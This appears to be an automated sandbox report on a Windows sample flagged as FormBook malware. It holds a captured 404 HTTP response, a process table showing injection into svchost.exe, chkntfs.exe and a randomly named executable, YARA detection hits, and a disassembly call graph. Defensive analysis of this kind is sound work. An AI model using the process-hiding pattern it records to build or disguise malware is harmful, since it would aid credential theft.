                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendl
                                                    Jan 13, 2025 09:36:14.943207979 CET92INData Raw: 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d
                                                    Data Ascii: y error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:03:33:19
                                                    Start date:13/01/2025
                                                    Path:C:\Users\user\Desktop\1001-13.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\1001-13.exe"
                                                    Imagebase:0xe30000
                                                    File size:1'616'384 bytes
                                                    MD5 hash:A3356244CC31500C395570F65839865D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:03:33:20
                                                    Start date:13/01/2025
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\1001-13.exe"
                                                    Imagebase:0xf30000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:03:34:00
                                                    Start date:13/01/2025
                                                    Path:C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe"
                                                    Imagebase:0xb40000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:8
                                                    Start time:03:34:03
                                                    Start date:13/01/2025
                                                    Path:C:\Windows\SysWOW64\chkntfs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                                                    Imagebase:0x7ff7934f0000
                                                    File size:19'968 bytes
                                                    MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:9
                                                    Start time:03:34:16
                                                    Start date:13/01/2025
                                                    Path:C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe"
                                                    Imagebase:0xb40000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:10
                                                    Start time:03:34:27
                                                    Start date:13/01/2025
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff728280000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:2.7%
                                                      Dynamic/Decrypted Code Coverage:2.1%
                                                      Signature Coverage:3.2%
                                                      Total number of Nodes:1658
                                                      Total number of Limit Nodes:42
                                                      execution_graph 95660 e32de3 95661 e32df0 __wsopen_s 95660->95661 95662 e32e09 95661->95662 95663 e72c2b ___scrt_fastfail 95661->95663 95676 e33aa2 95662->95676 95665 e72c47 GetOpenFileNameW 95663->95665 95667 e72c96 95665->95667 95734 e36b57 95667->95734 95671 e72cab 95671->95671 95673 e32e27 95704 e344a8 95673->95704 95746 e71f50 95676->95746 95679 e33ae9 95752 e3a6c3 95679->95752 95680 e33ace 95682 e36b57 22 API calls 95680->95682 95683 e33ada 95682->95683 95748 e337a0 95683->95748 95686 e32da5 95687 e71f50 __wsopen_s 95686->95687 95688 e32db2 GetLongPathNameW 95687->95688 95689 e36b57 22 API calls 95688->95689 95690 e32dda 95689->95690 95691 e33598 95690->95691 95803 e3a961 95691->95803 95694 e33aa2 23 API calls 95695 e335b5 95694->95695 95696 e335c0 95695->95696 95697 e732eb 95695->95697 95808 e3515f 95696->95808 95701 e7330d 95697->95701 95820 e4ce60 41 API calls 95697->95820 95703 e335df 95703->95673 95821 e34ecb 95704->95821 95707 e73833 95843 ea2cf9 95707->95843 95708 e34ecb 94 API calls 95710 e344e1 95708->95710 95710->95707 95714 e344e9 95710->95714 95711 e73848 95712 e7384c 95711->95712 95713 e73869 95711->95713 95893 e34f39 95712->95893 95716 e4fe0b 22 API calls 95713->95716 95717 e73854 95714->95717 95718 e344f5 95714->95718 95733 e738ae 95716->95733 95899 e9da5a 82 API calls 95717->95899 95892 e3940c 136 API calls 2 library calls 95718->95892 95721 e73862 95721->95713 95722 e32e31 95723 e73a5f 95728 e73a67 95723->95728 95724 e34f39 68 API calls 95724->95728 95728->95724 95901 e9989b 82 API calls __wsopen_s 95728->95901 95730 e39cb3 22 API calls 95730->95733 95733->95723 95733->95728 95733->95730 95869 e9967e 95733->95869 95872 ea0b5a 95733->95872 95878 e3a4a1 95733->95878 95886 e33ff7 95733->95886 95900 e995ad 42 API calls _wcslen 95733->95900 95735 e36b67 _wcslen 95734->95735 95736 e74ba1 95734->95736 95739 e36ba2 95735->95739 95740 e36b7d 95735->95740 95737 e393b2 22 API calls 95736->95737 95738 e74baa 95737->95738 95738->95738 95742 e4fddb 22 API calls 95739->95742 96254 e36f34 22 API calls 95740->96254 95744 e36bae 95742->95744 95743 e36b85 __fread_nolock 95743->95671 95745 e4fe0b 22 API calls 95744->95745 95745->95743 95747 e33aaf GetFullPathNameW 95746->95747 95747->95679 95747->95680 95749 e337ae 95748->95749 95758 e393b2 95749->95758 95751 e32e12 95751->95686 95753 e3a6d0 95752->95753 95754 e3a6dd 95752->95754 95753->95683 95755 e4fddb 22 API calls 95754->95755 95756 e3a6e7 95755->95756 95757 e4fe0b 22 API calls 95756->95757 95757->95753 95759 e393c0 95758->95759 95761 e393c9 __fread_nolock 95758->95761 95759->95761 95762 e3aec9 95759->95762 95761->95751 95763 e3aed9 __fread_nolock 95762->95763 95764 e3aedc 95762->95764 95763->95761 95768 e4fddb 95764->95768 95766 e3aee7 95778 e4fe0b 95766->95778 95770 e4fde0 95768->95770 95771 e4fdfa 95770->95771 95774 e4fdfc 95770->95774 95788 e5ea0c 95770->95788 95795 e54ead 7 API calls 2 library calls 95770->95795 95771->95766 95773 e5066d 95797 e532a4 RaiseException 95773->95797 95774->95773 95796 e532a4 RaiseException 95774->95796 95777 e5068a 95777->95766 95780 e4fddb 95778->95780 95779 e5ea0c ___std_exception_copy 21 API calls 95779->95780 95780->95779 95781 e4fdfa 95780->95781 95784 e4fdfc 95780->95784 95800 e54ead 7 API calls 2 library calls 95780->95800 95781->95763 95783 e5066d 95802 e532a4 RaiseException 95783->95802 95784->95783 95801 e532a4 RaiseException 95784->95801 95787 e5068a 95787->95763 95793 e63820 _abort 95788->95793 95789 e6385e 95799 e5f2d9 20 API calls _abort 95789->95799 95791 e63849 RtlAllocateHeap 95792 e6385c 95791->95792 95791->95793 95792->95770 95793->95789 95793->95791 95798 e54ead 7 API calls 2 library calls 95793->95798 95795->95770 95796->95773 95797->95777 95798->95793 95799->95792 95800->95780 95801->95783 95802->95787 95804 e4fe0b 22 API calls 95803->95804 95805 e3a976 95804->95805 95806 e4fddb 22 API calls 95805->95806 95807 e335aa 95806->95807 95807->95694 95809 e3516e 95808->95809 95813 e3518f __fread_nolock 95808->95813 95811 e4fe0b 22 API calls 95809->95811 95810 e4fddb 22 API calls 95812 e335cc 95810->95812 95811->95813 95814 e335f3 95812->95814 95813->95810 95815 e33605 95814->95815 95819 e33624 __fread_nolock 95814->95819 95817 e4fe0b 22 API calls 95815->95817 95816 e4fddb 22 API calls 95818 e3363b 95816->95818 95817->95819 95818->95703 95819->95816 95820->95697 95902 e34e90 LoadLibraryA 95821->95902 95826 e34ef6 LoadLibraryExW 95910 e34e59 LoadLibraryA 95826->95910 95827 e73ccf 95828 e34f39 68 API calls 95827->95828 95830 e73cd6 95828->95830 95832 e34e59 3 API calls 95830->95832 95834 e73cde 95832->95834 95932 e350f5 95834->95932 95835 e34f20 95835->95834 95836 e34f2c 95835->95836 95838 e34f39 68 API calls 95836->95838 95840 e344cd 95838->95840 95840->95707 95840->95708 95842 e73d05 95844 ea2d15 95843->95844 95845 e3511f 64 API calls 95844->95845 95846 ea2d29 95845->95846 96082 ea2e66 95846->96082 95849 e350f5 40 API calls 95850 ea2d56 95849->95850 95851 e350f5 40 API calls 95850->95851 95852 ea2d66 95851->95852 95853 e350f5 40 API calls 95852->95853 95854 ea2d81 95853->95854 95855 e350f5 40 API calls 95854->95855 95856 ea2d9c 95855->95856 95857 e3511f 64 API calls 95856->95857 95858 ea2db3 95857->95858 95859 e5ea0c ___std_exception_copy 21 API calls 95858->95859 95860 ea2dba 95859->95860 95861 e5ea0c ___std_exception_copy 21 API calls 95860->95861 95862 ea2dc4 95861->95862 95863 e350f5 40 API calls 95862->95863 95864 ea2dd8 95863->95864 95865 ea28fe 27 API calls 95864->95865 95867 ea2dee 95865->95867 95866 ea2d3f 95866->95711 95867->95866 96088 ea22ce 95867->96088 95870 e4fe0b 22 API calls 95869->95870 95871 e996ae __fread_nolock 95870->95871 95871->95733 95873 ea0b65 95872->95873 95874 e4fddb 22 API calls 95873->95874 95875 ea0b7c 95874->95875 96248 e39cb3 95875->96248 95879 e3a52b 95878->95879 95883 e3a4b1 __fread_nolock 95878->95883 95881 e4fe0b 22 API calls 95879->95881 95880 e4fddb 22 API calls 95882 e3a4b8 95880->95882 95881->95883 95884 e4fddb 22 API calls 95882->95884 95885 e3a4d6 95882->95885 95883->95880 95884->95885 95885->95733 95887 e3400a 95886->95887 95890 e340ae 95886->95890 95888 e4fe0b 22 API calls 95887->95888 95891 e3403c 95887->95891 95888->95891 95889 e4fddb 22 API calls 95889->95891 95890->95733 95891->95889 95891->95890 95892->95722 95894 e34f43 95893->95894 95895 e34f4a 95893->95895 95896 e5e678 67 API calls 95894->95896 95897 e34f6a FreeLibrary 95895->95897 95898 e34f59 95895->95898 95896->95895 95897->95898 95898->95717 95899->95721 95900->95733 95901->95728 95903 e34ec6 95902->95903 95904 e34ea8 GetProcAddress 95902->95904 95907 e5e5eb 95903->95907 95905 e34eb8 95904->95905 95905->95903 95906 e34ebf FreeLibrary 95905->95906 95906->95903 95940 e5e52a 95907->95940 95909 e34eea 95909->95826 95909->95827 95911 e34e6e GetProcAddress 95910->95911 95912 e34e8d 95910->95912 95913 e34e7e 95911->95913 95915 e34f80 95912->95915 95913->95912 95914 e34e86 FreeLibrary 95913->95914 95914->95912 95916 e4fe0b 22 API calls 95915->95916 95917 e34f95 95916->95917 96008 e35722 95917->96008 95919 e34fa1 __fread_nolock 95920 e350a5 95919->95920 95921 e73d1d 95919->95921 95931 e34fdc 95919->95931 96011 e342a2 CreateStreamOnHGlobal 95920->96011 96022 ea304d 74 API calls 95921->96022 95924 e73d22 95926 e3511f 64 API calls 95924->95926 95925 e350f5 40 API calls 95925->95931 95927 e73d45 95926->95927 95928 e350f5 40 API calls 95927->95928 95930 e3506e messages 95928->95930 95930->95835 95931->95924 95931->95925 95931->95930 96017 e3511f 95931->96017 95933 e35107 95932->95933 95934 e73d70 95932->95934 96044 e5e8c4 95933->96044 95937 ea28fe 96065 ea274e 95937->96065 95939 ea2919 95939->95842 95943 e5e536 ___scrt_is_nonwritable_in_current_image 95940->95943 95941 e5e544 95965 e5f2d9 20 API calls _abort 95941->95965 95943->95941 95945 e5e574 95943->95945 95944 e5e549 95966 e627ec 26 API calls ___std_exception_copy 95944->95966 95947 e5e586 95945->95947 95948 e5e579 95945->95948 95957 e68061 95947->95957 95967 e5f2d9 20 API calls _abort 95948->95967 95951 e5e58f 95952 e5e595 95951->95952 95953 e5e5a2 95951->95953 95968 e5f2d9 20 API calls _abort 95952->95968 95969 e5e5d4 LeaveCriticalSection __fread_nolock 95953->95969 95955 e5e554 __wsopen_s 95955->95909 95958 e6806d ___scrt_is_nonwritable_in_current_image 95957->95958 95970 e62f5e EnterCriticalSection 95958->95970 95960 e6807b 95971 e680fb 95960->95971 95964 e680ac __wsopen_s 95964->95951 95965->95944 95966->95955 95967->95955 95968->95955 95969->95955 95970->95960 95972 e6811e 95971->95972 95973 e68177 95972->95973 95980 e68088 95972->95980 95987 e5918d EnterCriticalSection 95972->95987 95988 e591a1 LeaveCriticalSection 95972->95988 95989 e64c7d 95973->95989 95978 e68189 95978->95980 96002 e63405 11 API calls 2 library calls 95978->96002 95984 e680b7 95980->95984 95981 e681a8 96003 e5918d EnterCriticalSection 95981->96003 96007 e62fa6 LeaveCriticalSection 95984->96007 95986 e680be 95986->95964 95987->95972 95988->95972 95994 e64c8a _abort 95989->95994 95990 e64cca 96005 e5f2d9 20 API calls _abort 95990->96005 95991 e64cb5 RtlAllocateHeap 95992 e64cc8 95991->95992 95991->95994 95996 e629c8 95992->95996 95994->95990 95994->95991 96004 e54ead 7 API calls 2 library calls 95994->96004 95997 e629d3 RtlFreeHeap 95996->95997 95998 e629fc __dosmaperr 95996->95998 95997->95998 95999 e629e8 95997->95999 95998->95978 96006 e5f2d9 20 API calls _abort 95999->96006 96001 e629ee GetLastError 96001->95998 96002->95981 96003->95980 96004->95994 96005->95992 96006->96001 96007->95986 96009 e4fddb 22 API calls 96008->96009 96010 e35734 96009->96010 96010->95919 96012 e342d9 96011->96012 96013 e342bc FindResourceExW 96011->96013 96012->95931 96013->96012 96014 e735ba LoadResource 96013->96014 96014->96012 96015 e735cf SizeofResource 96014->96015 96015->96012 96016 e735e3 LockResource 96015->96016 96016->96012 96018 e3512e 96017->96018 96021 e73d90 96017->96021 96023 e5ece3 96018->96023 96022->95924 96026 e5eaaa 96023->96026 96025 e3513c 96025->95931 96029 e5eab6 ___scrt_is_nonwritable_in_current_image 96026->96029 96027 e5eac2 96039 e5f2d9 20 API calls _abort 96027->96039 96029->96027 96030 e5eae8 96029->96030 96041 e5918d EnterCriticalSection 96030->96041 96031 e5eac7 96040 e627ec 26 API calls ___std_exception_copy 96031->96040 96034 e5eaf4 96042 e5ec0a 62 API calls 2 library calls 96034->96042 96036 e5eb08 96043 e5eb27 LeaveCriticalSection __fread_nolock 96036->96043 96038 e5ead2 __wsopen_s 96038->96025 96039->96031 96040->96038 96041->96034 96042->96036 96043->96038 96047 e5e8e1 96044->96047 96046 e35118 96046->95937 96048 e5e8ed ___scrt_is_nonwritable_in_current_image 96047->96048 96049 e5e900 ___scrt_fastfail 96048->96049 96050 e5e92d 96048->96050 96051 e5e925 __wsopen_s 96048->96051 96060 e5f2d9 20 API calls _abort 96049->96060 96062 e5918d EnterCriticalSection 96050->96062 96051->96046 96054 e5e937 96063 e5e6f8 38 API calls 4 library calls 96054->96063 96055 e5e91a 96061 e627ec 26 API calls ___std_exception_copy 96055->96061 96058 e5e94e 96064 e5e96c LeaveCriticalSection __fread_nolock 96058->96064 96060->96055 96061->96051 96062->96054 96063->96058 96064->96051 96068 e5e4e8 96065->96068 96067 ea275d 96067->95939 96071 e5e469 96068->96071 96070 e5e505 96070->96067 96072 e5e478 96071->96072 96074 e5e48c 96071->96074 96079 e5f2d9 20 API calls _abort 96072->96079 96078 e5e488 __alldvrm 96074->96078 96081 e6333f 11 API calls 2 library calls 96074->96081 96075 e5e47d 96080 e627ec 26 API calls ___std_exception_copy 96075->96080 96078->96070 96079->96075 96080->96078 96081->96078 96087 ea2e7a 96082->96087 96083 e350f5 40 API calls 96083->96087 96084 ea2d3b 96084->95849 96084->95866 96085 ea28fe 27 API calls 96085->96087 96086 e3511f 64 API calls 96086->96087 96087->96083 96087->96084 96087->96085 96087->96086 96089 ea22e7 96088->96089 96090 ea22d9 96088->96090 96092 ea232c 96089->96092 96093 e5e5eb 29 API calls 96089->96093 96111 ea22f0 96089->96111 96091 e5e5eb 29 API calls 96090->96091 96091->96089 96117 ea2557 40 API calls __fread_nolock 96092->96117 96094 ea2311 96093->96094 96094->96092 96096 ea231a 96094->96096 96096->96111 96125 e5e678 96096->96125 96097 ea2370 96098 ea2374 96097->96098 96099 ea2395 96097->96099 96102 ea2381 96098->96102 96104 e5e678 67 API calls 96098->96104 96118 ea2171 96099->96118 96105 e5e678 67 API calls 96102->96105 96102->96111 96103 ea239d 96106 ea23c3 96103->96106 96107 ea23a3 96103->96107 96104->96102 96105->96111 96138 ea23f3 74 API calls 96106->96138 96109 ea23b0 96107->96109 96110 e5e678 67 API calls 96107->96110 96109->96111 96112 e5e678 67 API calls 96109->96112 96110->96109 96111->95866 96112->96111 96113 ea23de 96113->96111 96116 e5e678 67 API calls 96113->96116 96114 ea23ca 96114->96113 96115 e5e678 67 API calls 96114->96115 96115->96113 96116->96111 96117->96097 96119 e5ea0c ___std_exception_copy 21 API calls 96118->96119 96120 ea217f 96119->96120 96121 e5ea0c ___std_exception_copy 21 API calls 96120->96121 96122 ea2190 96121->96122 96123 e5ea0c ___std_exception_copy 21 API calls 96122->96123 96124 ea219c 96123->96124 96124->96103 96126 e5e684 ___scrt_is_nonwritable_in_current_image 96125->96126 96127 e5e695 96126->96127 96128 e5e6aa 96126->96128 96156 e5f2d9 20 API calls _abort 96127->96156 96137 e5e6a5 __wsopen_s 96128->96137 96139 e5918d EnterCriticalSection 96128->96139 96130 e5e69a 96157 e627ec 26 API calls ___std_exception_copy 96130->96157 96133 e5e6c6 96140 e5e602 96133->96140 96135 e5e6d1 96158 e5e6ee LeaveCriticalSection __fread_nolock 96135->96158 96137->96111 96138->96114 96139->96133 96141 e5e624 96140->96141 96142 e5e60f 96140->96142 96147 e5e61f 96141->96147 96159 e5dc0b 96141->96159 96191 e5f2d9 20 API calls _abort 96142->96191 96144 e5e614 96192 e627ec 26 API calls ___std_exception_copy 96144->96192 96147->96135 96152 e5e646 96176 e6862f 96152->96176 96155 e629c8 _free 20 API calls 96155->96147 96156->96130 96157->96137 96158->96137 96160 e5dc23 96159->96160 96161 e5dc1f 96159->96161 96160->96161 96162 e5d955 __fread_nolock 26 API calls 96160->96162 96165 e64d7a 96161->96165 96163 e5dc43 96162->96163 96193 e659be 62 API calls 4 library calls 96163->96193 96166 e5e640 96165->96166 96167 e64d90 96165->96167 96169 e5d955 96166->96169 96167->96166 96168 e629c8 _free 20 API calls 96167->96168 96168->96166 96170 e5d976 96169->96170 96171 e5d961 96169->96171 96170->96152 96194 e5f2d9 20 API calls _abort 96171->96194 96173 e5d966 96195 e627ec 26 API calls ___std_exception_copy 96173->96195 96175 e5d971 96175->96152 96177 e68653 96176->96177 96178 e6863e 96176->96178 96179 e6868e 96177->96179 96183 e6867a 96177->96183 96199 e5f2c6 20 API calls _abort 96178->96199 96201 e5f2c6 20 API calls _abort 96179->96201 96182 e68643 96200 e5f2d9 20 API calls _abort 96182->96200 96196 e68607 96183->96196 96184 e68693 96202 e5f2d9 20 API calls _abort 96184->96202 96188 e5e64c 96188->96147 96188->96155 96189 e6869b 96203 e627ec 26 API calls ___std_exception_copy 96189->96203 96191->96144 96192->96147 96193->96161 96194->96173 96195->96175 96204 e68585 96196->96204 96198 e6862b 96198->96188 96199->96182 96200->96188 96201->96184 96202->96189 96203->96188 96205 e68591 ___scrt_is_nonwritable_in_current_image 96204->96205 96215 e65147 EnterCriticalSection 96205->96215 96207 e6859f 96208 e685c6 96207->96208 96209 e685d1 96207->96209 96216 e686ae 96208->96216 96231 e5f2d9 20 API calls _abort 96209->96231 96212 e685cc 96232 e685fb LeaveCriticalSection __wsopen_s 96212->96232 96214 e685ee __wsopen_s 96214->96198 96215->96207 96233 e653c4 96216->96233 96218 e686c4 96246 e65333 21 API calls 2 library calls 96218->96246 96219 e686be 96219->96218 96221 e653c4 __wsopen_s 26 API calls 96219->96221 96230 e686f6 96219->96230 96224 e686ed 96221->96224 96222 e653c4 __wsopen_s 26 API calls 96225 e68702 CloseHandle 96222->96225 96223 e6871c 96229 e6873e 96223->96229 96247 e5f2a3 20 API calls __dosmaperr 96223->96247 96227 e653c4 __wsopen_s 26 API calls 96224->96227 96225->96218 96228 e6870e GetLastError 96225->96228 96227->96230 96228->96218 96229->96212 96230->96218 96230->96222 96231->96212 96232->96214 96234 e653e6 96233->96234 96235 e653d1 96233->96235 96238 e5f2c6 __dosmaperr 20 API calls 96234->96238 96241 e6540b 96234->96241 96236 e5f2c6 __dosmaperr 20 API calls 96235->96236 96237 e653d6 96236->96237 96240 e5f2d9 __dosmaperr 20 API calls 96237->96240 96239 e65416 96238->96239 96242 e5f2d9 __dosmaperr 20 API calls 96239->96242 96243 e653de 96240->96243 96241->96219 96244 e6541e 96242->96244 96243->96219 96245 e627ec ___std_exception_copy 26 API calls 96244->96245 96245->96243 96246->96223 96247->96229 96249 e39cc2 _wcslen 96248->96249 96250 e4fe0b 22 API calls 96249->96250 96251 e39cea __fread_nolock 96250->96251 96252 e4fddb 22 API calls 96251->96252 96253 e39d00 96252->96253 96253->95733 96254->95743 96255 e72ba5 96256 e32b25 96255->96256 96257 e72baf 96255->96257 96283 e32b83 7 API calls 96256->96283 96298 e33a5a 96257->96298 96260 e72bb8 96263 e39cb3 22 API calls 96260->96263 96265 e72bc6 96263->96265 96264 e32b2f 96272 e32b44 96264->96272 96287 e33837 96264->96287 96266 e72bf5 96265->96266 96267 e72bce 96265->96267 96270 e333c6 22 API calls 96266->96270 96305 e333c6 96267->96305 96281 e72bf1 GetForegroundWindow ShellExecuteW 96270->96281 96277 e32b5f 96272->96277 96297 e330f2 Shell_NotifyIconW ___scrt_fastfail 96272->96297 96280 e32b66 SetCurrentDirectoryW 96277->96280 96278 e72c26 96278->96277 96279 e333c6 22 API calls 96279->96281 96282 e32b7a 96280->96282 96281->96278 96323 e32cd4 7 API calls 96283->96323 96285 e32b2a 96286 e32c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96285->96286 96286->96264 96288 e33862 ___scrt_fastfail 96287->96288 96324 e34212 96288->96324 96292 e338e8 96293 e73386 Shell_NotifyIconW 96292->96293 96294 e33906 Shell_NotifyIconW 96292->96294 96328 e33923 96294->96328 96296 e3391c 96296->96272 96297->96277 96299 e71f50 __wsopen_s 96298->96299 96300 e33a67 GetModuleFileNameW 96299->96300 96301 e39cb3 22 API calls 96300->96301 96302 e33a8d 96301->96302 96303 e33aa2 23 API calls 96302->96303 96304 e33a97 96303->96304 96304->96260 96306 e730bb 96305->96306 96307 e333dd 96305->96307 96309 e4fddb 22 API calls 96306->96309 96360 e333ee 96307->96360 96311 e730c5 _wcslen 96309->96311 96310 e333e8 96314 e36350 96310->96314 96312 e4fe0b 22 API calls 96311->96312 96313 e730fe __fread_nolock 96312->96313 96315 e36362 96314->96315 96316 e74a51 96314->96316 96375 e36373 96315->96375 96385 e34a88 22 API calls __fread_nolock 96316->96385 96319 e74a5b 96321 e74a67 96319->96321 96322 e3a8c7 22 API calls 96319->96322 96320 e3636e 96320->96279 96322->96321 96323->96285 96325 e735a4 96324->96325 96326 e338b7 96324->96326 96325->96326 96327 e735ad DestroyIcon 96325->96327 96326->96292 96350 e9c874 42 API calls _strftime 96326->96350 96327->96326 96329 e33a13 96328->96329 96330 e3393f 96328->96330 96329->96296 96351 e36270 96330->96351 96333 e73393 LoadStringW 96336 e733ad 96333->96336 96334 e3395a 96335 e36b57 22 API calls 96334->96335 96337 e3396f 96335->96337 96344 e33994 ___scrt_fastfail 96336->96344 96356 e3a8c7 96336->96356 96338 e733c9 96337->96338 96339 e3397c 96337->96339 96340 e36350 22 API calls 96338->96340 96339->96336 96342 e33986 96339->96342 96345 e733d7 96340->96345 96343 e36350 22 API calls 96342->96343 96343->96344 96347 e339f9 Shell_NotifyIconW 96344->96347 96345->96344 96346 e333c6 22 API calls 96345->96346 96348 e733f9 96346->96348 96347->96329 96349 e333c6 22 API calls 96348->96349 96349->96344 96350->96292 96352 e4fe0b 22 API calls 96351->96352 96353 e36295 96352->96353 96354 e4fddb 22 API calls 96353->96354 96355 e3394d 96354->96355 96355->96333 96355->96334 96357 e3a8ea __fread_nolock 96356->96357 96358 e3a8db 96356->96358 96357->96344 96358->96357 96359 e4fe0b 22 API calls 96358->96359 96359->96357 96361 e333fe _wcslen 96360->96361 96362 e33411 96361->96362 96363 e7311d 96361->96363 96370 e3a587 96362->96370 96364 e4fddb 22 API calls 96363->96364 96366 e73127 96364->96366 96368 e4fe0b 22 API calls 96366->96368 96367 e3341e __fread_nolock 96367->96310 96369 e73157 __fread_nolock 96368->96369 96372 e3a59d 96370->96372 96374 e3a598 __fread_nolock 96370->96374 96371 e7f80f 96372->96371 96373 e4fe0b 22 API calls 96372->96373 96373->96374 96374->96367 96376 e363b6 __fread_nolock 96375->96376 96377 e36382 96375->96377 96376->96320 96377->96376 96378 e74a82 96377->96378 96379 e363a9 96377->96379 96381 e4fddb 22 API calls 96378->96381 96380 e3a587 22 API calls 96379->96380 96380->96376 96382 e74a91 96381->96382 96383 e4fe0b 22 API calls 96382->96383 96384 e74ac5 __fread_nolock 96383->96384 96385->96319 96386 e68402 96391 e681be 